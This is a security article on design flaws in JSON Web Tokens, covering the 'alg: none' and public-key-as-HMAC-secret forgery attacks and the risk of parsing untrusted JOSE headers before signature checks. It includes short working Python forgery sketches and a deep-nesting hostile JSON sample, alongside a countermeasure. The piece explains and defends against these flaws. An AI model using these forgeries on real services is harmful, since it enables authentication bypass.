This article assumes the reader has at least a basic understanding of JWT and cryptographic signatures. For a very basic JWT primer, please visit the introduction to JSON Web Tokens at https://jwt.io/introduction/.
JSON Web Tokens (JWT) enjoy wide popularity, forming the basis for OpenID Connect (OIDC) and many OAuth2 solutions. They are intended to provide a mechanism for encapsulating a set of application-dependent claims within a token whose origin, integrity, and (optionally) confidentiality are cryptographically assured.
Similar standards have been proposed before. There is the Simple Web Token (SWT), in which the claims are HTML form-encoded and signed using a single, fixed algorithm: HMAC-SHA256. Then there is JSON Simple Sign (JSS), a predecessor of JWS and JWT. In JSS, the claims are expressed in JSON and the signing algorithm is selected by the token issuer, with the apparent goal of making JSS future-proof and not locked into the use of symmetric keys, with all of their associated issues.
The JWT stack is a more modern and fully developed set of building blocks, where JWT focuses on the claims themselves and relies upon JSON Web Signature (JWS) or JSON Web Encryption (JWE) for token encapsulation. This article will focus on JWT with JWS tokenization as described in https://tools.ietf.org/html/rfc7515.
Let’s start by going over well-known, documented vulnerabilities surrounding use of the ‘alg’ header field. Tim McLean wrote a good article, Critical vulnerabilities in JSON Web Token libraries (https://www.chosenplaintext.ca/2015/03/31/jwt-algorithm-confusion.html), where he describes a couple of the most widely known.
The exploit everyone knows about is that the JWS specifications curiously allow for a special type of algorithm known as ‘none’. When supported, it becomes trivial for an attacker to forge or alter a token by simply wiping away its signature and changing the algorithm id from whatever it was to ‘none’, knowing that the decoding library will interpret this to mean that it should not bother with any verification at all.
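The ‘none’ attack can be sketched in a few lines of Python. All token contents and the helper names below are illustrative; the point is only that no key or cryptography is needed to produce a token that a vulnerable library will accept:

```python
# Sketch of the 'alg: none' attack: take an existing signed token, rewrite its
# JOSE header to claim the 'none' algorithm, and drop the signature entirely.
import base64
import json

def b64url(data: bytes) -> str:
    # base64url encoding without padding, per RFC 7515.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_none(token: str) -> str:
    _header_b64, payload_b64, _sig = token.split(".")
    forged_header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    # The signature segment is left empty; a vulnerable decoder sees 'none'
    # and skips verification altogether.
    return f"{forged_header}.{payload_b64}."

# A hypothetical HS256 token (signature bytes are dummy placeholders).
original = ".".join([
    b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()),
    b64url(json.dumps({"sub": "alice", "admin": False}).encode()),
    "c2lnbmF0dXJl",
])
forged = forge_none(original)
```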
The other is less obvious. It involves swapping an asymmetric algorithm for a symmetric one and using the signer’s published public verification key as the symmetric secret. Since the attacker and the victim’s decoding library are in possession of the same key bytes, a token can be forged or altered and signed symmetrically, exploiting a library that blindly obeys the ‘alg’ value.
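A minimal sketch of that key-confusion attack, assuming the issuer normally signs with RS256 and publishes its RSA public key (the PEM bytes below are a placeholder):

```python
# RS256 -> HS256 key confusion: the attacker signs the forged token with
# HMAC-SHA256, keyed with the issuer's *public* key bytes. A library that
# blindly honors 'alg' will verify the HMAC using that same public key.
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Placeholder standing in for the issuer's published RSA public key PEM.
public_key_pem = b"-----BEGIN PUBLIC KEY-----\nMIIB...example...\n-----END PUBLIC KEY-----\n"

header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "alice", "admin": True}).encode())
signing_input = f"{header}.{payload}".encode()

# Symmetric signature keyed with bytes both sides possess.
sig = b64url(hmac.new(public_key_pem, signing_input, hashlib.sha256).digest())
forged = f"{header}.{payload}.{sig}"
```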
The ‘alg’ value vulnerabilities can be exploited to allow a forged or altered token to slip through a decoding library. There are similar attacks against keys where a victim library may be given, or induced to retrieve, a verification key of the attacker’s choice, and the whole key management approach is vulnerable to DNS and PKI exploits.
But token authenticity is only one of the concerns when using JWT. An attack surface that has not received any attention to my knowledge is the underlying JSON parser. Fundamental design flaws in the JWT stack expose its JSON parser to direct attack where a carefully crafted payload can exploit vulnerabilities in its implementation to overtake the running process, and potentially gain a foothold on its host.
JWS produces a signed object. A signed document is another type of signed object. So is a signed executable. The first rule of handling signed objects is to distrust their contents until the signature has been verified. A verified signature provides high confidence that the contents are original. If asymmetric keys have been used, it also provides a high confidence identification of the signer.
JWS (like JSS) was designed to support an unbounded set of signing algorithms. Because of this, the algorithm and key need to be known before a signature can be verified. These are stored within a structure known as the JSON Object Signing and Encryption (JOSE) header. The JOSE header is populated and combined with the token payload, and together they are signed using the algorithm and key indicated in the JOSE header. Finally, the signature is appended to the token. Since the header is included within a token’s signature, its integrity can be verified.
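That construction can be sketched with the JWS compact serialization and HS256. The key and claim values are hypothetical; the structure (base64url header, dot, base64url payload, dot, base64url signature over the first two segments) follows RFC 7515:

```python
# Building a JWS compact-serialized token with HS256, per RFC 7515.
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

key = b"shared-secret"  # hypothetical symmetric key
header = {"alg": "HS256", "typ": "JWT"}  # the JOSE header names the algorithm
claims = {"sub": "alice", "iss": "https://issuer.example"}

# The signature covers both the encoded header and the encoded payload.
signing_input = f"{b64url(json.dumps(header).encode())}.{b64url(json.dumps(claims).encode())}"
signature = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
token = f"{signing_input}.{b64url(signature)}"
```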
The recipe for decoding a JWS-encoded JWT given in RFC-7515 (https://tools.ietf.org/html/rfc7515) starts by isolating the JOSE header and sending it directly to the library’s JSON parser so that its contents may be examined. This is done before the signature has been verified, because signature verification requires information contained in the header. This is a very serious design flaw that violates the first rule of handling signed objects by forcing library implementations to pass an unknown octet sequence directly to the parser before any trust has been established - or is even possible.
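The problematic ordering is easy to see in code. This sketch mirrors the first steps of the RFC 7515 decoding recipe; `decode_header` is a hypothetical name:

```python
# First steps of decoding a JWS compact token per RFC 7515 section 5.2:
# the header segment is base64url-decoded and fed to the JSON parser
# *before* any signature check, because the parser's output ('alg', 'kid')
# is what signature verification depends on.
import base64
import json

def decode_header(token: str) -> dict:
    header_b64 = token.split(".")[0]
    padded = header_b64 + "=" * (-len(header_b64) % 4)
    raw = base64.urlsafe_b64decode(padded)  # still attacker-controlled bytes
    return json.loads(raw)  # the JSON parser runs on wholly untrusted input
```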
Let’s look at that again. We don’t want to let an untrusted token get through the library, which is the motivation for signing the tokens in the first place. Yet the design of JWS and its decoding recipe require us to trust token contents (specifically, the JOSE header) in the process. We have no idea whether the octet stream representing the serialized header is valid JSON or even text. For all we know it could be a payload carrying shell code, carefully crafted to exploit an implementation bug in the JSON parser. The only defense available to an RFC-compliant implementation is to use a military-grade JSON parser proven to be invulnerable to all attacks. Yours probably isn’t.
The fundamental design flaw that creates the rich attack surface described above is the recursion caused by putting the metadata required for signature verification into the untrusted object.
The next design flaw is the choice of JSON as the representation for the JOSE header. A well-defined binary header structure could have been employed instead, removing the need for a parser and making extraction of the algorithm and key information a low-risk operation. The JOSE specification for JWS says it’s legal to put anything you want in the header as long as it’s proper JSON. And JSON itself has a rich set of potentially exploitable properties that make it difficult to parse safely: unbounded string lengths, number lengths, array element counts, object member counts, and object nesting depth; repeated object member names, empty member names, arbitrary Unicode characters, and UTF-8 encoding. All of these make parsing JSON an extremely high-risk operation.
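One of those properties, unbounded nesting depth, is easy to demonstrate. Python’s `json` module happens to guard against it with a recursion limit; a parser without such a guard can exhaust the stack and crash on the same input:

```python
# Hostile-input illustration: 100,000 levels of array nesting in a string
# an attacker could place in a JOSE header. Python's json module aborts with
# RecursionError rather than blowing the stack; not every parser does.
import json

hostile = "[" * 100000 + "]" * 100000
try:
    json.loads(hostile)
    outcome = "parsed"
except RecursionError:
    outcome = "parser refused deep nesting"
```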
The third design flaw is in separating algorithm ids from key ids. Allowing them to be separate creates the kinds of vulnerabilities described in Tim McLean’s article.
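One common countermeasure, in defiance of a token’s own claims, is to bind the algorithm to the key on the verifier side and reject any token whose ‘alg’ disagrees. The key table and ids below are hypothetical:

```python
# Countermeasure sketch: each key id is pinned to exactly one algorithm.
# The token's 'alg' field is checked against the pin, never obeyed on its own.
KEYS = {
    "issuer-key-1": ("RS256", "<issuer RSA public key PEM>"),
    "internal-hmac": ("HS256", b"shared-secret"),
}

def select_verifier(header: dict):
    kid = header.get("kid")
    if kid not in KEYS:
        raise ValueError("unknown key id")
    expected_alg, key = KEYS[kid]
    if header.get("alg") != expected_alg:
        # Refuses both the 'none' swap and asymmetric-to-symmetric swaps.
        raise ValueError("algorithm does not match pinned key")
    return expected_alg, key
```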
There are several other design flaws related to the JOSE header and its design, many of which can be countered by implementing policy in defiance of the RFC. But the really tough nut to crack is the exposure of the JSON parser.